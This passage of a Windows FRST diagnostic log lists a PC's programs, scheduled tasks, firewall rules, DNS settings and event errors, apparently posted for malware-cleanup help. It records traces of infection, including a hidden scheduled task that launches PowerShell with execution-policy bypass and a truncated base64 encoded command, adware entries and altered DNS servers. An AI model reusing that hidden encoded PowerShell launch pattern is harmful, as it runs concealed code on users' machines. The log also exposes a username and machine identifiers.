(HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\Amazon Kindle) (Version: 1.14.0.43019 - Amazon) AMD Catalyst Install Manager (HKLM\...\{A30D3EA3-B90A-DDD5-949E-6DDE67E64FE6}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.) AudibleManager (HKLM-x32\...\AudibleManager) (Version: 508.36643952.36635232.36643960 - Audible, Inc.) Avast SecureLine (HKLM\...\{2CD3C92F-EDC5-4B02-9B0A-9C1D37C58EF5}_is1) (Version: 1.0.239.2 - AVAST Software) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.) Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.) CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.5.6713 - CyberLink Corp.) CyberLink PhotoDirector (Version: 5.0.5.6713 - CyberLink Corp.) Hidden CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.3.6129 - CyberLink Corp.) CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.5.4601 - CyberLink Corp.) CyberLink PowerDirector 12 (Version: 12.0.5.4601 - CyberLink Corp.) Hidden CyberLink YouCam (HKLM-x32\...\{A9CEDD6E-4792-493e-BB35-D86D2E188A5A}) (Version: 6.0.1.4301 - CyberLink Corp.) DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company) Evernote v. 5.8.6 (HKLM-x32\...\{FEDC7C10-EF67-11E4-9B07-00505695D7B0}) (Version: 5.8.6.7519 - Evernote Corp.) Extended Update (HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\UpdaterEX) (Version: - Extended Update) C:\Users\bbabq\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {035F9A0E-F095-4926-8D7E-3677F91DDF28} - \UpdaterEX -> No File C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation) Task: {0EC61FD5-879C-4DC2-8F55-E1E5835D7568} - System32\Tasks\Avast SecureLine => C:\Program Files\AVAST Software\SecureLine\SecureLine.exe [2016-03-01] (AVAST Software) Task: {12B6513F-4597-4570-BB75-F7FFCF9D7C68} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-03-24] (HP Inc.) Task: {143F5EBF-DBD8-4720-A46E-3D58BE9BBFD3} - System32\Tasks\{0E047F47-0F0C-7809-0511-09090C09110C} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9448 more characters). Task: {2EA0C586-5740-4ABF-A6E0-CAF1FF685C16} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated) Task: {428CA93D-547E-4F19-8901-BC5D0F2D32C0} - System32\Tasks\Trezaa Scheduler => C:\Program Files [2016-04-03] () Task: {43EE6F95-16DF-482F-B72F-023B56302061} - System32\Tasks\HPCeeScheduleForbbabq => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard) Task: {4585E528-3EE6-4D7C-977A-8ACA7839C34B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-02-18] (Hewlett-Packard Company) Task: {5AB86702-F6A4-4FA0-A308-CAF0B0ABDBFC} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\platform\McUICnt.exe [2015-11-02] (McAfee, Inc.) Task: {5EFBCBC4-EA36-4660-B94B-5449F2760C3A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-03-07] (Hewlett-Packard) Task: {661CB389-8769-4009-8781-35756EFB1C77} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-30] (Google Inc.) Task: {67DAA743-4F85-42FD-AA7A-CE1D816B6B88} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-03-11] (Hewlett-Packard) Task: {6AF8D662-D9D8-4141-B406-53A51AE36995} - System32\Tasks\McAfee\McAfee Idle Detection Task Task: {70E4B28B-305E-4D75-8579-4090965AF345} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-03-02] (Hewlett-Packard) Task: {75FFF643-CCF2-4DFF-90BA-B954114EC2E4} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-03-24] (HP Inc.) Task: {766A10C9-0513-4949-87F7-2FDDB803D151} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-03-23] (Adobe Systems Incorporated) Task: {76F20A60-E5A4-4EE8-928D-D000D229AB37} - System32\Tasks\avast! SL Update => C:\Program Files\AVAST Software\SecureLine\SLUpdate.exe [2016-03-01] (AVAST Software) Task: {771111C8-F5B5-40E0-9EF4-8C6B5E0F6769} - System32\Tasks\WpsUpdateTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdate.exe [2015-12-01] (Zhuhai Kingsoft Office Software Co.,Ltd) Task: {82455775-2BE5-439D-A053-402B4383CDC3} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe [2015-07-01] (CyberLink Corp.) Task: {8AF461FD-E7E7-42B6-8637-BFDDE7CD891C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-02-18] (Hewlett-Packard Company) Task: {8CD1BE1D-05AD-4F9D-BAD0-51C4DA985F91} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-03-02] (Hewlett-Packard) Task: {A1B5F412-B13F-4BA4-9110-2270D7080E7D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-30] (Google Inc.) Task: {A49447BA-1532-4B02-BDDA-FC7475268E38} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-08] (Microsoft Corporation) Task: {D28505B7-AD59-48CC-9228-F0F235526484} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent Task: {D5462382-9816-4CF6-A34C-4971E4F51383} - System32\Tasks\WpsNotifyTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsnotify.exe [2015-12-01] (Zhuhai Kingsoft Office Software Co.,Ltd) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\HPCeeScheduleForbbabq.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe Task: C:\WINDOWS\Tasks\UpdaterEX.job => Task: C:\WINDOWS\Tasks\WpsNotifyTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsnotify.exe Task: C:\WINDOWS\Tasks\WpsUpdateTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdate.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) ShortcutWithArgument: C:\Users\bbabq\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.amazon.com/gp/bit/amazonbookmark.html?tag=hp2-desktop-us-20&partner=HP ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square ==================== Loaded Modules (Whitelisted) ============== 2015-08-06 23:39 - 2015-08-06 23:39 - 00127488 _____ () c:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll 2016-03-01 12:01 - 2016-03-01 12:01 - 00465088 _____ () C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe 2016-02-06 12:50 - 2014-04-14 19:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe 2015-10-30 01:18 - 2015-10-30 01:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2016-03-01 16:09 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2016-03-01 16:09 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll 2016-03-01 16:08 - 2016-02-23 02:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-01-29 18:21 - 2016-01-29 18:22 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe 2016-01-29 05:57 - 2016-01-29 05:57 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 00936960 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 00529408 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.NodeWinrtWrap.dll 2015-10-30 01:18 - 2015-10-30 03:07 - 00037888 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\winrt-projections\bin\Winrt_Projections.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00796160 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http\bin\NodeRT_Windows_Web_Http.node 2015-10-30 01:18 - 2015-10-30 03:07 - 00961024 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http.headers\bin\NodeRT_Windows_Web_Http_Headers.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00206336 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http.filters\bin\NodeRT_Windows_Web_Http_Filters.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00558592 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.storage.streams\bin\NodeRT_Windows_Storage_Streams.node 2015-10-30 01:18 - 2015-10-30 03:07 - 00397824 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.foundation\bin\NodeRT_Windows_Foundation.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00181248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\nodert-buffer-utils\bin\NodeRT_Buffer_Utils.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00093696 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.security.cryptography\bin\NodeRT_Windows_Security_Cryptography.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00200192 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.cortana.pal\bin\NodeRT_Windows_Cortana_PAL.node 2016-03-01 12:01 - 2016-03-01 12:01 - 38907672 _____ () C:\Program Files\AVAST Software\SecureLine\libcef.dll 2016-01-29 18:21 - 2016-01-29 18:22 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll 2016-01-29 18:21 - 2016-01-29 18:22 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll 2016-04-02 13:28 - 2016-04-02 13:28 - 01114136 _____ () C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742\extensions\support@lastpass.com\platform\WINNT_x86-msvc\components\lpxpcom.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service" ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2015-07-10 05:04 - 2016-02-06 11:57 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\Control Panel\Desktop\\Wallpaper -> DNS Servers: 82.163.142.7 - 95.211.158.134 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.) HKLM\...\StartupApproved\Run: => "Logitech Download Assistant" HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\StartupApproved\Run: => "OneDrive" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{FDAEBCB3-F5A9-42F7-8C3F-39D78E0ABEEC}] => (Allow) C:\Program Files (x86)\Trezaa\Trezaa.Service.exe FirewallRules: [{42EEF81F-4C9A-4DDC-84BA-F20839A8442C}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE FirewallRules: [{6521111C-920B-4760-AFD8-5152E76594E5}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{4E603F95-AB34-4911-B4C0-B39536C8885E}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPSOCKSVC.exe FirewallRules: [{AC51C347-7E4E-4ADD-B48A-B55B73354012}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{9252EA31-7C72-41FD-9653-B80BA4EE3758}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{A8843FF4-C01E-462A-9467-8652C31CF1CF}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{160B6ECD-45D8-49C5-AB7C-BC8E8584D976}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{ADDAC2C0-2AEE-4CF7-85C3-5C58B56C1CA2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{F8FB2788-6856-4F2C-B309-EF7B6F18C838}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{D110CFC2-E1C0-485B-A1A7-046B980AD4C8}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{7846F584-5E55-4485-AD66-8BC48C57602F}] => (Allow) C:\Program Files\CyberLink\PowerDirector12\PDR10.EXE FirewallRules: [{8D0992F6-4987-46C4-BF0F-A1EEC2BAEF05}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{4FD7FD7C-E74C-484D-A974-2E161EE94813}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe FirewallRules: [{FE6B793B-655B-4455-B65F-547A7DDEB41F}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe FirewallRules: [{4089EE43-D108-44D0-BC72-408C6A3E1607}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe FirewallRules: [{B48B0DE3-DE8B-4D77-81EB-461475AC00B6}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe FirewallRules: [{E5CE62D6-4261-4E2A-A591-A90EC152F2F7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe ==================== Restore Points ========================= 14-03-2016 17:48:29 HPSF Applying updates 22-03-2016 18:28:36 Windows Update 02-04-2016 10:14:30 HPSF Applying updates 03-04-2016 10:46:44 AA11 ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (04/03/2016 01:37:50 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 01:13:50 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 01:07:47 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 12:46:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 12:37:47 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 12:21:05 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 12:07:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 11:52:53 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 11:31:04 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 11:23:01 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. System errors: ============= Error: (04/03/2016 01:39:02 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 01:39:02 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 01:39:02 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 01:39:02 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 12:54:01 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 12:54:01 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 12:37:52 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable Error: (04/03/2016 12:18:21 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 12:18:21 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 12:18:21 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 CodeIntegrity: =================================== Date: 2016-04-03 10:37:56.557 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-31 05:37:03.861 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-03-31 05:37:03.784 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-03-29 15:00:50.990 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-23 16:45:46.118 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be 